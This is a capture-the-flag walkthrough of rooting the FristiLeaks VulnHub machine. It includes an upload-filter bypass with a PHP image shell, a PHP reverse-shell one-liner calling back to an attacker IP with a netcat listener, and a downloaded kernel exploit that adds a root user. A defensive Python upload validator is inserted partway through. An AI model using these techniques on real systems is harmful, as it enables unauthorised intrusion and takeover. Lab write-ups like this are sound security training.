Hi, let's see how we rooted Fristi by Ar0xA from Vulnhub.
First, find the IP and do a port scan.
We have only one port open. Let's scan it using Nikto and Gobuster.
Now Gobuster.
Visit the pages found. Nothing interesting, right?
We need to find something else. Have a look at the following address.
http://192.168.18.80/fristi/
A login page, right?
Let's try breaking it. SQL injection didn't work, so there must be some other way. Let's have a look at the source code.
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
Need to look more 🙂 Scroll down to the end.
<!--
-->
Looks like this is base64 encoded. Let's try decoding it.
Visit https://www.base64decode.org/ for decoding.
Seems like a PNG image? Let's try decoding it as an image here: https://base64.guru/converter/decode/image/png
We got an Image.
Hope this is the password. But what about the username? admin? fristi?
They didn't work. Let's try eezeepz.
Yes. We are logged in now. We have a file upload form here, but it accepts only images.
We need to upload a PHP shell as an image here.
I used this shell:
https://github.com/melbinkm/PHPImageShell
Rename the file to shell.php.gif and upload.
Fire up Burp Suite and catch the upload request.
Edit the filename in the request to shell.php.gif and send.
We get a response saying it was uploaded to the uploads directory. Now head to /uploads/shell.php.gif
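The check the rename-and-upload trick gets past, next to a hardened version that a defender would want, as an added Python example that is not part of this walkthrough or the FristiLeaks VM; the sample GIF bytes, the polyglot body and all function names are constructed for illustration:

```python
import os
import secrets
from typing import Optional

# Constructed sample inputs: a minimal valid 1x1 GIF, and a GIF/PHP polyglot
# of the kind the walkthrough uploads (real GIF header, constructed PHP body).
GIF_BYTES = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02D\x01\x00;")
POLYGLOT_BYTES = b"GIF89a" + b"<?php /* constructed placeholder body */ ?>"

IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpg",
}


def naive_is_image_upload(filename: str) -> bool:
    """The kind of check the walkthrough bypasses: it trusts the client-supplied
    name and only looks at its last extension, so 'shell.php.gif' passes."""
    return filename.lower().endswith((".gif", ".png", ".jpg", ".jpeg"))


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the file's magic bytes, or None."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def hardened_store_name(filename: str, data: bytes) -> Optional[str]:
    """Decide whether to accept an upload and what to store it as.
    Returns a server-chosen filename, or None to reject the upload."""
    base = os.path.basename(filename)  # drop any directory components
    # Reject multi-dotted names outright: with Apache's AddHandler, mod_mime
    # applies handlers to every extension, so 'shell.php.gif' runs as PHP.
    if base.count(".") != 1 or base.startswith("."):
        return None
    ext = sniff_image_type(data)
    if ext is None:
        return None
    # The stored extension comes from the sniffed content and the name from the
    # server, never from the client. A polyglot with a valid header still lands
    # here as '<random>.gif'; re-encoding through an image library would strip
    # its PHP body, which this example does not do.
    return f"{secrets.token_hex(16)}.{ext}"
```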
Now we can set up a listener on our Kali machine and connect back from this shell.
nc -nlvp 1234
Enter the following command and click Exec.
php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
We got a connection to our Kali machine.
Now it's time for privilege escalation. Use the command uname -a
to find out the OS version.
Let's search for an exploit.
What about using this?
https://www.exploit-db.com/exploits/40839
Let's try it.
Let's download the file using wget.
Time to compile and run the exploit.
Done! We have a new user firefart
with password pass
Let's see if it is present in /etc/passwd.
Yes, it's there at the top. Now let's switch to our new account and check our root access.
Yes! We are root now. What about the flag?
That's all. It took me a little more time to find the fristi directory, but the privilege escalation part was quick.